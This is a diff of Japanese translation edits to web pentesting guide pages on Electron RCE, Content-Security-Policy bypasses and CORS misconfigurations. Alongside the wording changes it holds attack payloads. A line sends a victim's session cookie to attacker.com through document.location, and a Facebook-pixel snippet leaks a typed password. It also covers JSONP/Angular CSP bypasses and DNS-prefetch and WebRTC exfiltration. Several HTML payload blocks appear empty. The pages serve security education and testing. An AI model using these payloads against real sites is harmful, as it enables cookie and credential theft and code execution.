 npx asar extract app.asar destfolder #Extract everything
 npx asar extract-file app.asar main.js #Extract just a file
@@ -42,7 +42,7 @@ Electronアプリケーションは、Node APIを介して**デバイスにア
 - [**`sandbox`**](https://docs.w3cub.com/electron/api/sandbox-option) - デフォルトではオフです。NodeJSが実行できるアクションを制限します。
 - WorkersにおけるNode Integration
 - **`nodeIntegrationInSubframes`** - デフォルトでは`off`です。
-- **`nodeIntegration`**が**有効**になっている場合、これはElectronアプリケーション内のiframeで**読み込まれた**ウェブページで**Node.js APIs**の使用を許可します。
+- **`nodeIntegration`**が**有効**になっている場合、これはElectronアプリケーション内のiframeで**読み込まれたウェブページ**で**Node.js APIs**を使用することを許可します。
 - **`nodeIntegration`**が**無効**になっている場合、preloadsはiframe内で読み込まれます。
 
 構成の例:
@@ -101,9 +101,9 @@ start-main構成を変更し、次のようなプロキシの使用を追加し
 ```javascript
 "start-main": "electron ./dist/main/main.js --proxy-server=127.0.0.1:8080 --ignore-certificateerrors",
 ```
-## Electronローカルコードインジェクション
+## Electron Local Code Injection
 
-Electronアプリをローカルで実行できる場合、任意のJavaScriptコードを実行させることが可能です。方法は以下を確認してください:
+Electronアプリをローカルで実行できる場合、任意のJavaScriptコードを実行させることが可能です。方法を確認してください:
 
 {{#ref}}
 ../../../macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md
@@ -111,7 +111,7 @@ Electronアプリをローカルで実行できる場合、任意のJavaScript
 
 ## RCE: XSS + nodeIntegration
 
-**nodeIntegration**が**on**に設定されている場合、ウェブページのJavaScriptは`require()`を呼び出すだけでNode.jsの機能を簡単に使用できます。例えば、Windowsで計算機アプリケーションを実行する方法は次の通りです:
+**nodeIntegration**が**on**に設定されている場合、ウェブページのJavaScriptは`require()`を呼び出すだけでNode.jsの機能を簡単に使用できます。例えば、Windowsでcalcアプリケーションを実行する方法は次の通りです:
 ```html
 
 
 ```
-## **RCE: XSS + Old Chromium**
+## **RCE: XSS + 古いChromium**
 
-もしアプリケーションで使用されている**chromium**が**古い**もので、**既知の****脆弱性**がある場合、**XSSを通じてそれを****悪用してRCEを取得する**ことが可能かもしれません。\
+もしアプリケーションで使用されている**chromium**が**古い**もので、**既知の****脆弱性**がある場合、**XSSを通じてそれを悪用しRCEを取得する**ことが可能かもしれません。\
 この**writeup**の例を参照してください: [https://blog.electrovolt.io/posts/discord-rce/](https://blog.electrovolt.io/posts/discord-rce/)
 
-## **XSS Phishing via Internal URL regex bypass**
+## **内部URLの正規表現バイパスによるXSSフィッシング**
 
-XSSを見つけたが、**RCEをトリガーできないか内部ファイルを盗むことができない**場合、**フィッシングを通じて資格情報を盗む**ためにそれを使用することを試みることができます。
+XSSを見つけたが、**RCEをトリガーできないまたは内部ファイルを盗むことができない**場合、**フィッシングを通じて資格情報を盗む**ためにそれを使用することを試みることができます。
 
 まず最初に、新しいURLを開こうとしたときに何が起こるかを知る必要があります。フロントエンドのJSコードを確認してください:
 ```javascript
@@ -283,7 +283,7 @@ webContents.on("will-navigate", function (event, url) {}                    // o
 ```
 **`openInternally`**への呼び出しは、**リンク**がプラットフォームに属するリンクであるため、**デスクトップウィンドウ**で**開かれる**か、**ブラウザで3rdパーティリソース**として**開かれる**かを決定します。
 
-関数によって使用される**regex**が**バイパスに対して脆弱**な場合(例えば、**サブドメインのドットをエスケープしない**場合)、攻撃者はXSSを悪用して、攻撃者のインフラストラクチャに位置する**新しいウィンドウを開き**、ユーザーに**認証情報を要求する**ことができます。
+関数で使用される**regex**が**バイパスに対して脆弱**な場合(例えば、**サブドメインのドットをエスケープしていない**場合)、攻撃者はXSSを悪用して、攻撃者のインフラストラクチャに位置する**新しいウィンドウを開き**、ユーザーに**認証情報を要求する**ことができます。
 ```html
 `
 
 #### self + 'unsafe-inline' via Iframes
 
+
 {{#ref}}
 csp-bypass-self-+-unsafe-inline-with-iframes.md
 {{#endref}}
@@ -120,13 +121,13 @@ csp-bypass-self-+-unsafe-inline-with-iframes.md
 ```yaml
 Content-Security-Policy: script-src https://google.com 'unsafe-eval';
 ```
-動作するペイロード:
+作業ペイロード:
 ```html
 
 ```
 ### strict-dynamic
 
-もしあなたが何らかの方法で**許可されたJSコードがあなたのJSコードを使って新しいスクリプトタグをDOMに作成する**ことができれば、許可されたスクリプトがそれを作成しているため、**新しいスクリプトタグは実行されることが許可されます**。
+もしあなたが何らかの方法で**許可されたJSコードがあなたのJSコードを含む新しいスクリプトタグをDOMに作成する**ことができれば、許可されたスクリプトがそれを作成しているため、**新しいスクリプトタグは実行を許可される**。
 
 ### Wildcard (\*)
 ```yaml
@@ -139,7 +140,7 @@ Content-Security-Policy: script-src 'self' https://google.com https: data *;
 ```
 ### object-src と default-src の欠如
 
-> [!CAUTION] > **これはもはや機能していないようです**
+> [!CAUTION] > **これがもう機能していないようです**
 ```yaml
 Content-Security-Policy: script-src 'self' ;
 ```
@@ -161,22 +162,22 @@ JSファイルをアップロードできる場合、このCSPをバイパスで
 ```
 しかし、サーバーが**アップロードされたファイルを検証している**可能性が高く、**特定のタイプのファイルのみをアップロードすることを許可する**でしょう。
 
-さらに、サーバーが受け入れる拡張子を持つファイルに**JSコードを含めてアップロードできたとしても**(例えば、_script.png_のように)、これは十分ではありません。なぜなら、Apacheサーバーのような一部のサーバーは**拡張子に基づいてファイルのMIMEタイプを選択し**、Chromeのようなブラウザは**画像であるべきものの中のJavascript**コードを**実行することを拒否する**からです。「幸運にも」、間違いがあります。例えば、CTFから学んだことですが、**Apacheは**_**.wave**_拡張子を知らないため、**audio/**のような**MIMEタイプで提供しません**。
+さらに、サーバーが受け入れる拡張子を持つファイルに**JSコードを含めてアップロードできたとしても**(例えば、_script.png_のように)、これは十分ではありません。なぜなら、Apacheサーバーのような一部のサーバーは**拡張子に基づいてファイルのMIMEタイプを選択し**、Chromeのようなブラウザは**画像であるべきものの中にあるJavascript**コードを**実行することを拒否します**。「幸運にも」、間違いがあります。例えば、CTFから学んだことですが、**Apacheは**_**.wave**_拡張子を知らないため、**audio/***のようなMIMEタイプで提供しません。
 
 ここから、XSSとファイルアップロードを見つけ、**誤解された拡張子**を見つけることができれば、その拡張子を持つファイルとスクリプトの内容をアップロードしようとすることができます。また、サーバーがアップロードされたファイルの正しい形式をチェックしている場合は、ポリグロットを作成することができます([ここにいくつかのポリグロットの例があります](https://github.com/Polydet/polyglot-database))。
 
 ### フォームアクション
 
-JSを注入することができない場合でも、例えば資格情報を**フォームアクションを注入することで**流出させることを試みることができます(そして、パスワードマネージャーが自動的にパスワードを入力することを期待するかもしれません)。[**このレポートに例があります**](https://portswigger.net/research/stealing-passwords-from-infosec-mastodon-without-bypassing-csp)も見てください。また、`default-src`はフォームアクションをカバーしていないことに注意してください。
+JSを注入することが不可能な場合でも、例えば資格情報を**フォームアクションを注入することで**流出させることを試みることができます(そして、パスワードマネージャーが自動的にパスワードを入力することを期待するかもしれません)。[**このレポートに例があります**](https://portswigger.net/research/stealing-passwords-from-infosec-mastodon-without-bypassing-csp)ので、確認してください。また、`default-src`はフォームアクションをカバーしていないことに注意してください。
 
 ### サードパーティエンドポイント + ('unsafe-eval')
 
 > [!WARNING]
-> 次のペイロードのいくつかに対して**`unsafe-eval`は必要ない**場合もあります。
+> 次のペイロードのいくつかに対しては、**`unsafe-eval`は必要ない**場合すらあります。
 ```yaml
 Content-Security-Policy: script-src https://cdnjs.cloudflare.com 'unsafe-eval';
 ```
-脆弱なバージョンのangularをロードし、任意のJSを実行します:
+脆弱なバージョンのAngularをロードし、任意のJSを実行します:
 ```xml
 
 
 {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1);//');}} 

@@ -199,7 +200,7 @@ With some bypasses from: https://blog.huli.tw/2022/08/29/en/intigriti-0822-xss-a
 ```
 #### Angularを使用したペイロード + `window`オブジェクトを返す関数を持つライブラリ ([この投稿をチェックしてください](https://blog.huli.tw/2022/09/01/en/angularjs-csp-bypass-cdnjs/)):
 
-> [!NOTE]
+> [!TIP]
 > この投稿では、`cdn.cloudflare.com`(または他の許可されたJSライブラリリポジトリ)からすべての**ライブラリ**を**ロード**し、各ライブラリから追加されたすべての関数を実行し、**どのライブラリのどの関数が`window`オブジェクトを返すか**を確認できることが示されています。
 ```html
 
@@ -232,7 +233,7 @@ With some bypasses from: https://blog.huli.tw/2022/08/29/en/intigriti-0822-xss-a
 ```
 #### Google reCAPTCHA JSコードの悪用
 
-According to [**this CTF writeup**](https://blog-huli-tw.translate.goog/2023/07/28/google-zer0pts-imaginary-ctf-2023-writeup/?_x_tr_sl=es&_x_tr_tl=en&_x_tr_hl=es&_x_tr_pto=wapp#noteninja-3-solves) you can abuse [https://www.google.com/recaptcha/](https://www.google.com/recaptcha/) inside a CSP to execute arbitrary JS code bypassing the CSP:
+[**このCTFの解説**](https://blog-huli-tw.translate.goog/2023/07/28/google-zer0pts-imaginary-ctf-2023-writeup/?_x_tr_sl=es&_x_tr_tl=en&_x_tr_hl=es&_x_tr_pto=wapp#noteninja-3-solves)によると、CSP内で[https://www.google.com/recaptcha/](https://www.google.com/recaptcha/)を悪用して、CSPをバイパスし任意のJSコードを実行することができます。
 ```html
 

 ```
-より多くの[**このレポートからのペイロード**](https://joaxcar.com/blog/2024/02/19/csp-bypass-on-portswigger-net-using-google-script-resources/):
+より多くの[**この文書からのペイロード**](https://joaxcar.com/blog/2024/02/19/csp-bypass-on-portswigger-net-using-google-script-resources/):
 ```html
 
 
@@ -274,7 +275,7 @@ script.google.com内のページで情報を受け取るためにGoogle Apps Scr
 ```http
 Content-Security-Policy: script-src 'self' https://www.google.com https://www.youtube.com; object-src 'none';
 ```
-このようなシナリオでは、`script-src`が`self`および特定のホワイトリストに登録されたドメインに設定されている場合、JSONPを使用してバイパスできます。JSONPエンドポイントは、安全でないコールバックメソッドを許可し、攻撃者がXSSを実行できるようにします。動作するペイロード:
+このようなシナリオでは、`script-src`が`self`および特定のホワイトリストに登録されたドメインに設定されている場合、JSONPを使用してバイパスできます。JSONPエンドポイントは、安全でないコールバックメソッドを許可し、攻撃者がXSSを実行できるようにします。動作するペイロード:
 ```html
 ">
 ">
@@ -284,9 +285,13 @@ Content-Security-Policy: script-src 'self' https://www.google.com https://www.yo
 https://www.youtube.com/oembed?callback=alert;
 
 ```
+
+```html
+
+```
 [**JSONBee**](https://github.com/zigoo0/JSONBee) **は、さまざまなウェブサイトのCSPバイパスに使用できるJSONPエンドポイントを含んでいます。**
 
-**信頼されたエンドポイントにオープンリダイレクトが含まれている場合**、同じ脆弱性が発生します。なぜなら、初期のエンドポイントが信頼されている場合、リダイレクトも信頼されるからです。
+**信頼されたエンドポイントにオープンリダイレクトが含まれている**場合、同じ脆弱性が発生します。なぜなら、初期のエンドポイントが信頼されている場合、リダイレクトも信頼されるからです。
 
 ### 第三者の悪用
 
@@ -318,24 +323,24 @@ Content-Security-Policy​: connect-src www.facebook.com;​
 1. ここでFacebook Developerアカウントを作成します。
 2. 新しい「Facebook Login」アプリを作成し、「Website」を選択します。
 3. 「Settings -> Basic」に移動し、「App ID」を取得します。
-4. データを抽出したいターゲットサイトで、Facebook SDKガジェット「fbq」を使用して「customEvent」とデータペイロードを通じてデータを抽出できます。
+4. データを抽出したいターゲットサイトでは、「customEvent」とデータペイロードを通じてFacebook SDKガジェット「fbq」を直接使用してデータを抽出できます。
 5. アプリの「Event Manager」に移動し、作成したアプリケーションを選択します(イベントマネージャーは、次のようなURLで見つけることができます: https://www.facebook.com/events\_manager2/list/pixel/\[app-id]/test\_events)。
 6. 「Test Events」タブを選択して、「あなたの」ウェブサイトから送信されるイベントを確認します。
 
-次に、被害者側で、攻撃者のFacebook Developerアカウントのapp-idを指すようにFacebookトラッキングピクセルを初期化し、次のようにカスタムイベントを発行するためのコードを実行します。
+次に、被害者側で、攻撃者のFacebook Developerアカウントのapp-idを指すようにFacebookトラッキングピクセルを初期化し、次のようなカスタムイベントを発行するために以下のコードを実行します。
 ```JavaScript
 fbq('init', '1279785999289471');​ // this number should be the App ID of the attacker's Meta/Facebook account
 fbq('trackCustom', 'My-Custom-Event',{​
 data: "Leaked user password: '"+document.getElementById('user-password').innerText+"'"​
 });
 ```
-前の表で指定された他の7つのサードパーティドメインについては、それらを悪用する方法が他にもたくさんあります。その他のサードパーティの悪用についての追加説明は、以前の[ブログ投稿](https://sensepost.com/blog/2023/dress-codethe-talk/#bypasses)を参照してください。
+前の表に指定された他の7つのサードパーティドメインについては、それらを悪用する方法が他にもたくさんあります。その他のサードパーティの悪用についての追加説明は、以前の[ブログ投稿](https://sensepost.com/blog/2023/dress-codethe-talk/#bypasses)を参照してください。
 
-### RPO(相対パス上書き)によるバイパス 
+### RPO(相対パス上書き)を介したバイパス 
 
-前述のパス制限を回避するためのリダイレクションに加えて、いくつかのサーバーで使用できる相対パス上書き(RPO)という別の技術があります。
+前述のパス制限を回避するためのリダイレクションに加えて、いくつかのサーバーで使用できる相対パス上書き(RPO)と呼ばれる別の技術があります。
 
-例えば、CSPがパス`https://example.com/scripts/react/`を許可している場合、次のようにバイパスできます:
+たとえば、CSPがパス `https://example.com/scripts/react/` を許可している場合、次のようにバイパスできます:
 ```html
 
 ```
@@ -343,7 +348,7 @@ data: "Leaked user password: '"+document.getElementById('user-password').innerTe
 
 これは、ブラウザにとって `https://example.com/scripts/react/` の下にある `..%2fangular%2fangular.js` という名前のファイルを読み込んでいるため、CSPに準拠しています。
 
-∑、彼らはそれをデコードし、実際には `https://example.com/scripts/react/../angular/angular.js` をリクエストします。これは `https://example.com/scripts/angular/angular.js` と同等です。
+∑、彼らはそれをデコードし、実際には `https://example.com/scripts/react/../angular/angular.js` をリクエストすることになります。これは `https://example.com/scripts/angular/angular.js` と同等です。
 
 **ブラウザとサーバー間のURL解釈の不一致を利用することで、パスルールをバイパスできます**。
 
@@ -353,20 +358,21 @@ data: "Leaked user password: '"+document.getElementById('user-password').innerTe
 
 ### Iframes JS 実行
 
+
 {{#ref}}
 ../xss-cross-site-scripting/iframes-in-xss-and-csp.md
 {{#endref}}
 
-### **base-uri** が欠落している場合
+### **base-uri** が欠落している
 
 **base-uri** ディレクティブが欠落している場合、[**ダングリングマークアップインジェクション**](../dangling-markup-html-scriptless-injection/index.html)を実行するために悪用できます。
 
-さらに、**相対パスを使用してスクリプトを読み込んでいるページ**(例えば ``内に**埋め込む**ことができます。この**スクリプト**は、**'self'によって許可されているため、**ロードされます。さらに、WordPressがインストールされているため、攻撃者は**CSPをバイパスする**脆弱な**コールバック**エンドポイントを通じて**SOME攻撃を悪用**し、ユーザーにより多くの権限を与えたり、新しいプラグインをインストールしたりすることができます...\
+攻撃者はそのエンドポイントを悪用して、WordPressに対して**SOME攻撃を生成**し、``内に**埋め込む**ことができます。この**スクリプト**は、**'self'によって許可されているため**、**読み込まれます**。さらに、WordPressがインストールされているため、攻撃者は**CSPをバイパスする**脆弱な**コールバック**エンドポイントを通じて**SOME攻撃を悪用**し、ユーザーにより多くの権限を与えたり、新しいプラグインをインストールしたりすることができます...\
 この攻撃を実行する方法の詳細については、[https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/](https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/)を確認してください。
 
 ## CSP Exfiltration Bypasses
@@ -636,7 +642,7 @@ SOMEは、**ページのエンドポイント**でXSS(または非常に制限
 
 ### Location
 
-攻撃者のサーバーに秘密情報を送信するために、単にロケーションを更新することができます:
+攻撃者のサーバーに秘密の情報を送信するために、単にロケーションを更新することができます:
 ```javascript
 var sessionid = document.cookie.split("=")[1] + "."
 document.location = "https://attacker.com/?" + sessionid
@@ -669,16 +675,16 @@ linkEl.rel = "prefetch"
 linkEl.href = urlWithYourPreciousData
 document.head.appendChild(linkEl)
 ```
-この問題を避けるために、サーバーはHTTPヘッダーを送信できます:
+この問題を避けるために、サーバーはHTTPヘッダーを送信できます:
 ```
 X-DNS-Prefetch-Control: off
 ```
-> [!NOTE]
+> [!TIP]
 > この技術はヘッドレスブラウザ(ボット)では機能しないようです。
 
 ### WebRTC
 
-いくつかのページでは、**WebRTCはCSPの`connect-src`ポリシーをチェックしない**と記載されています。
+いくつかのページで、**WebRTCはCSPの`connect-src`ポリシーをチェックしない**と記載されています。
 
 実際、_DNSリクエスト_を使用して情報を_リーク_することができます。このコードを確認してください:
 ```javascript
@@ -731,6 +737,7 @@ iconURL:"https:"+your_data+"example.com"
 - [https://www.youtube.com/watch?v=MCyPuOWs3dg](https://www.youtube.com/watch?v=MCyPuOWs3dg)
 - [https://aszx87410.github.io/beyond-xss/en/ch2/csp-bypass/](https://aszx87410.github.io/beyond-xss/en/ch2/csp-bypass/)
 - [https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/](https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/)
+- [https://cside.dev/blog/weaponized-google-oauth-triggers-malicious-websocket](https://cside.dev/blog/weaponized-google-oauth-triggers-malicious-websocket)
 
 ​
 
diff --git a/src/pentesting-web/cors-bypass.md b/src/pentesting-web/cors-bypass.md
index 57d99b105..496cf718b 100644
--- a/src/pentesting-web/cors-bypass.md
+++ b/src/pentesting-web/cors-bypass.md
@@ -6,14 +6,14 @@
 
 Cross-Origin Resource Sharing (CORS) 標準は、**サーバーが自分の資産にアクセスできる者を定義し**、**外部ソースから許可されるHTTPリクエストメソッドを定義する**ことを可能にします。
 
-**同一オリジン**ポリシーは、**リソースを要求する**サーバーと**リソース**をホストするサーバーが同じプロトコル(例:`http://`)、ドメイン名(例:`internal-web.com`)、および**ポート**(例:80)を共有することを義務付けます。このポリシーの下では、同じドメインとポートのウェブページのみがリソースにアクセスすることが許可されます。
+**同一オリジン**ポリシーは、**リソースを要求する**サーバーと**リソース**をホストするサーバーが同じプロトコル(例:`http://`)、ドメイン名(例:`internal-web.com`)、および**ポート**(例:80)を共有することを義務付けます。このポリシーの下では、同じドメインとポートのウェブページのみがリソースにアクセスできます。
 
 `http://normal-website.com/example/example.html` の文脈における同一オリジンポリシーの適用は以下のように示されます:
 
 | アクセスされたURL                          | アクセスは許可されますか?               |
 | ----------------------------------------- | --------------------------------------- |
-| `http://normal-website.com/example/`      | はい:同一のスキーム、ドメイン、ポート   |
-| `http://normal-website.com/example2/`     | はい:同一のスキーム、ドメイン、ポート   |
+| `http://normal-website.com/example/`      | はい:同一のスキーム、ドメイン、ポート |
+| `http://normal-website.com/example2/`     | はい:同一のスキーム、ドメイン、ポート |
 | `https://normal-website.com/example/`     | いいえ:異なるスキームとポート         |
 | `http://en.normal-website.com/example/`   | いいえ:異なるドメイン                  |
 | `http://www.normal-website.com/example/`  | いいえ:異なるドメイン                  |
@@ -23,15 +23,15 @@ Cross-Origin Resource Sharing (CORS) 標準は、**サーバーが自分の資
 
 ### `Access-Control-Allow-Origin` ヘッダー
 
-このヘッダーは、**複数のオリジン**、**`null`**値、またはワイルドカード**`*`**を許可することができます。しかし、**複数のオリジンをサポートするブラウザはありません**、またワイルドカード`*`の使用には**制限**があります。(ワイルドカードは単独で使用する必要があり、`Access-Control-Allow-Credentials: true`と一緒に使用することは許可されていません。)
+このヘッダーは、**複数のオリジン**、**`null`** 値、またはワイルドカード **`*`** を許可することができます。しかし、**複数のオリジンをサポートするブラウザはありません**、またワイルドカード `*` の使用には**制限**があります。(ワイルドカードは単独で使用する必要があり、`Access-Control-Allow-Credentials: true` と一緒に使用することは許可されていません。)
 
-このヘッダーは、ウェブサイトによって開始されたクロスドメインリソースリクエストに対する応答として**サーバーによって発行され**、ブラウザは自動的に`Origin`ヘッダーを追加します。
+このヘッダーは、ウェブサイトによって開始されたクロスドメインリソースリクエストに対する応答として**サーバーによって発行され**、ブラウザは自動的に `Origin` ヘッダーを追加します。
 
 ### `Access-Control-Allow-Credentials` ヘッダー
 
-**デフォルト**では、クロスオリジンリクエストはクッキーやAuthorizationヘッダーのような資格情報なしで行われます。しかし、クロスドメインサーバーは、`Access-Control-Allow-Credentials`ヘッダーを**`true`**に設定することで、資格情報が送信された場合に応答の読み取りを許可できます。
+**デフォルト**では、クロスオリジンリクエストはクッキーやAuthorizationヘッダーのような資格情報なしで行われます。しかし、クロスドメインサーバーは、`Access-Control-Allow-Credentials` ヘッダーを **`true`** に設定することで、資格情報が送信された場合に応答の読み取りを許可できます。
 
-`true`に設定されている場合、ブラウザは資格情報(クッキー、認証ヘッダー、またはTLSクライアント証明書)を送信します。
+`true` に設定されると、ブラウザは資格情報(クッキー、認証ヘッダー、またはTLSクライアント証明書)を送信します。
 ```javascript
 var xhr = new XMLHttpRequest()
 xhr.onreadystatechange = function () {
@@ -62,11 +62,11 @@ xhr.send("Arun")
 
 ### クロスドメイン通信におけるプレフライトリクエストの理解
 
-特定の条件下でクロスドメインリクエストを開始する際、例えば **非標準HTTPメソッド**(HEAD、GET、POST以外の任意のもの)を使用したり、新しい **ヘッダー** を導入したり、特別な **Content-Typeヘッダー値** を使用したりする場合、プレフライトリクエストが必要になることがあります。この予備リクエストは **`OPTIONS`** メソッドを利用して、サーバーに今後のクロスオリジンリクエストの意図、使用するHTTPメソッドやヘッダーを通知します。
+特定の条件下でクロスドメインリクエストを開始する際、例えば **非標準HTTPメソッド**(HEAD、GET、POST以外の任意のもの)を使用したり、新しい **ヘッダー** を導入したり、特別な **Content-Typeヘッダー値** を使用したりする場合、プレフライトリクエストが必要になることがあります。この予備的なリクエストは、**`OPTIONS`** メソッドを利用して、サーバーに今後のクロスオリジンリクエストの意図、使用するHTTPメソッドやヘッダーを通知します。
 
-**クロスオリジンリソースシェアリング(CORS)** プロトコルは、このプレフライトチェックを義務付けており、要求されたクロスオリジン操作の実行可能性を確認するために、許可されたメソッド、ヘッダー、およびオリジンの信頼性を検証します。プレフライトリクエストが不要な条件についての詳細な理解は、[**Mozilla Developer Network (MDN)**](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple_requests) が提供する包括的なガイドを参照してください。
+**クロスオリジンリソースシェアリング(CORS)** プロトコルは、このプレフライトチェックを義務付けており、要求されたクロスオリジン操作の実行可能性を確認するために、許可されたメソッド、ヘッダー、およびオリジンの信頼性を検証します。プレフライトリクエストが不要となる条件についての詳細な理解は、[**Mozilla Developer Network (MDN)**](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple_requests) が提供する包括的なガイドを参照してください。
 
-**プレフライトリクエストがない場合でも、レスポンスに認証ヘッダーを含める必要があることに注意することが重要です**。これらのヘッダーがないと、ブラウザはクロスオリジンリクエストからのレスポンスを処理することができません。
+プレフライトリクエストがない場合でも、レスポンスに認証ヘッダーを含める必要があることに注意することが重要です。これらのヘッダーがないと、ブラウザはクロスオリジンリクエストからのレスポンスを処理することができません。
 
 以下は、`PUT` メソッドと `Special-Request-Header` というカスタムヘッダーを使用することを目的としたプレフライトリクエストの例です:
 ```
@@ -88,21 +88,21 @@ Access-Control-Allow-Credentials: true
 Access-Control-Max-Age: 240
 ```
 - **`Access-Control-Allow-Headers`**: このヘッダーは、実際のリクエスト中に使用できるヘッダーを指定します。これは、クライアントからのリクエストで許可されるヘッダーを示すためにサーバーによって設定されます。
-- **`Access-Control-Expose-Headers`**: このヘッダーを通じて、サーバーはクライアントに対して、単純なレスポンスヘッダーに加えてレスポンスの一部として公開できるヘッダーを通知します。
+- **`Access-Control-Expose-Headers`**: このヘッダーを通じて、サーバーはクライアントに対して、単純なレスポンスヘッダー以外にレスポンスの一部として公開できるヘッダーについて通知します。
 - **`Access-Control-Max-Age`**: このヘッダーは、プレフライトリクエストの結果がどれくらいの間キャッシュできるかを示します。サーバーは、プレフライトリクエストによって返される情報が再利用される最大時間(秒単位)を設定します。
-- **`Access-Control-Request-Headers`**: プレフライトリクエストで使用されるこのヘッダーは、クライアントによって設定され、実際のリクエストで使用したいHTTPヘッダーをサーバーに通知します。
-- **`Access-Control-Request-Method`**: プレフライトリクエストでも使用されるこのヘッダーは、クライアントによって設定され、実際のリクエストで使用されるHTTPメソッドを示します。
-- **`Origin`**: このヘッダーはブラウザによって自動的に設定され、クロスオリジンリクエストの発信元を示します。サーバーは、CORSポリシーに基づいて、受信リクエストを許可するか拒否するかを評価するために使用します。
+- **`Access-Control-Request-Headers`**: プレフライトリクエストで使用されるこのヘッダーは、クライアントによって設定され、実際のリクエストで使用したいHTTPヘッダーについてサーバーに通知します。
+- **`Access-Control-Request-Method`**: このヘッダーもプレフライトリクエストで使用され、クライアントによって設定され、実際のリクエストで使用されるHTTPメソッドを示します。
+- **`Origin`**: このヘッダーはブラウザによって自動的に設定され、クロスオリジンリクエストの発信元を示します。これは、サーバーがCORSポリシーに基づいて受信リクエストを許可または拒否するかどうかを評価するために使用されます。
 
-通常、(コンテンツタイプや設定されたヘッダーによって異なりますが)**GET/POSTリクエストではプレフライトリクエストは送信されません**(リクエストは**直接**送信されます)が、**レスポンスのヘッダー/ボディにアクセスしたい場合**は、_Access-Control-Allow-Origin_ ヘッダーがそれを許可する必要があります。\
+通常、(コンテンツタイプと設定されたヘッダーによって異なりますが)**GET/POSTリクエストではプレフライトリクエストは送信されません**(リクエストは**直接**送信されます)が、**レスポンスのヘッダー/ボディにアクセスしたい場合**、それを許可する_Access-Control-Allow-Origin_ヘッダーが含まれている必要があります。\
 **したがって、CORSはCSRFから保護しません(ただし、役立つ場合があります)。**
 
 ### **ローカルネットワークリクエスト プレフライトリクエスト**
 
 1. **`Access-Control-Request-Local-Network`**: このヘッダーは、クライアントのリクエストに含まれ、問い合わせがローカルネットワークリソースを対象としていることを示します。これは、リクエストがローカルネットワーク内から発信されていることをサーバーに通知するマーカーとして機能します。
-2. **`Access-Control-Allow-Local-Network`**: サーバーはこのヘッダーを使用して、要求されたリソースがローカルネットワーク外のエンティティと共有されることが許可されていることを伝えます。これは、異なるネットワーク境界を越えたリソースの共有を許可するためのグリーンライトとして機能し、セキュリティプロトコルを維持しながら制御されたアクセスを確保します。
+2. **`Access-Control-Allow-Local-Network`**: サーバーは、リクエストされたリソースがローカルネットワーク外のエンティティと共有されることが許可されていることを伝えるために、このヘッダーを使用します。これは、異なるネットワーク境界を越えてリソースを共有するためのグリーンライトとして機能し、セキュリティプロトコルを維持しながら制御されたアクセスを確保します。
 
-**ローカルネットワークリクエストを許可する有効なレスポンス**は、レスポンスにヘッダー `Access-Controls-Allow-Local_network: true` を含む必要があります。
+**ローカルネットワークリクエストを許可する有効なレスポンス**には、レスポンスにヘッダー`Access-Controls-Allow-Local_network: true`も含まれている必要があります。
 ```
 HTTP/1.1 200 OK
 ...
@@ -114,9 +114,9 @@ Content-Length: 0
 ...
 ```
 > [!WARNING]
-> 注意してください、linuxの**0.0.0.0** IPは、localhostにアクセスするためのこれらの要件を**バイパス**するために機能します。このIPアドレスは「ローカル」と見なされません。
+> 注意してください、linuxの**0.0.0.0** IPは、localhostにアクセスするためのこれらの要件を**バイパス**するのに機能します。このIPアドレスは「ローカル」と見なされません。
 >
-> **ローカルネットワークの要件をバイパスする**ことも可能です。**ローカルエンドポイントのパブリックIPアドレス**(ルーターのパブリックIPなど)を使用する場合です。なぜなら、いくつかの状況では、**パブリックIP**にアクセスしていても、**ローカルネットワークから**の場合、アクセスが許可されるからです。
+> また、**ローカルネットワークの要件をバイパスする**ことも可能です。**ローカルエンドポイントのパブリックIPアドレス**(ルーターのパブリックIPなど)を使用する場合です。なぜなら、いくつかの状況では、**パブリックIP**にアクセスしていても、**ローカルネットワークから**であれば、アクセスが許可されるからです。
 
 ### ワイルドカード
 
@@ -129,15 +129,15 @@ Access-Control-Allow-Credentials: true
 
 ## 悪用可能な誤設定
 
-`Access-Control-Allow-Credentials`を**`true`**に設定することがほとんどの**実際の攻撃**の前提条件であることが観察されています。この設定により、ブラウザは資格情報を送信し、応答を読み取ることができ、攻撃の効果が高まります。これがないと、ブラウザにリクエストを発行させる利点は減少し、ユーザーのクッキーを利用することが不可能になります。
+`Access-Control-Allow-Credentials` を **`true`** に設定することがほとんどの **実際の攻撃** の前提条件であることが観察されています。この設定により、ブラウザは資格情報を送信し、応答を読み取ることができ、攻撃の効果が高まります。これがなければ、ブラウザにリクエストを発行させる利点は減少し、ユーザーのクッキーを利用することが不可能になります。
 
 ### 例外: ネットワーク位置を認証として悪用する
 
 被害者のネットワーク位置が認証の一形態として機能する例外があります。これにより、被害者のブラウザをプロキシとして使用し、IPベースの認証を回避してイントラネットアプリケーションにアクセスすることが可能になります。この方法はDNSリバインディングと影響が似ていますが、悪用が簡単です。
 
-### `Access-Control-Allow-Origin`における`Origin`の反映
+### `Access-Control-Allow-Origin` における `Origin` の反映
 
-`Origin`ヘッダーの値が`Access-Control-Allow-Origin`に反映される現実のシナリオは、これらのヘッダーを組み合わせる制限により理論的にはあり得ません。しかし、複数のURLに対してCORSを有効にしようとする開発者は、`Origin`ヘッダーの値をコピーすることで`Access-Control-Allow-Origin`ヘッダーを動的に生成することがあります。このアプローチは脆弱性を引き起こす可能性があり、特に攻撃者が正当であるように見える名前のドメインを使用する場合、検証ロジックを欺くことになります。
+`Origin` ヘッダーの値が `Access-Control-Allow-Origin` に反映される現実のシナリオは、これらのヘッダーを組み合わせる制限により理論的にはあり得ません。しかし、複数のURLに対してCORSを有効にしようとする開発者は、`Origin` ヘッダーの値をコピーすることで `Access-Control-Allow-Origin` ヘッダーを動的に生成することがあります。このアプローチは脆弱性を引き起こす可能性があり、特に攻撃者が正当なように見える名前のドメインを使用する場合、検証ロジックを欺くことになります。
 ```html
 
 ```
-### `null` オリジンの悪用
+### `null`オリジンの悪用
 
